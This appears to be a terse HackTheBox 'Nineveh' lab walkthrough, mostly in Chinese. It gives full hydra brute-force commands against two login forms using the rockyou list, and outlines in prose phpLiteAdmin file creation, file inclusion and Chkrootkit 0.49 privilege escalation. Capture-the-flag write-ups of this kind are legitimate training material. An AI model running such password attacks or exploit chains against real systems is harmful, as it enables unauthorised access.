HackTheBox-Nineveh
OSCP like
1 | hydra -l none -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt 10.129.25.30 -s 443 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password" -t 64 -V |
登陆上phpliteadmin,利用可以自定义后缀的漏洞,能创建任意php脚本。但是创建的文件位置在/var/tmp/下,不在web目录下,不能直接利用,需要借助文件包含什么的。
1 | hydra -l admin -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt 10.129.25.30 -s 80 http-post-form "/department/login.php:username=^USER^password=^PASS^:Invalid Password!" -t 64 -V |
登陆后,发现notes好像存在文件包含。
最后成功包含,被包含的文件要包含NinevehNotes字符。
发现根目录下有个/report/目录,里面有文件report-21-04-11:10:23.txt
看了下文件内容,判断是chkrookit创建的。存在漏洞Chkrootkit 0.49 - Local Privilege Escalation
创建一个文件/tmp/update,给执行权限。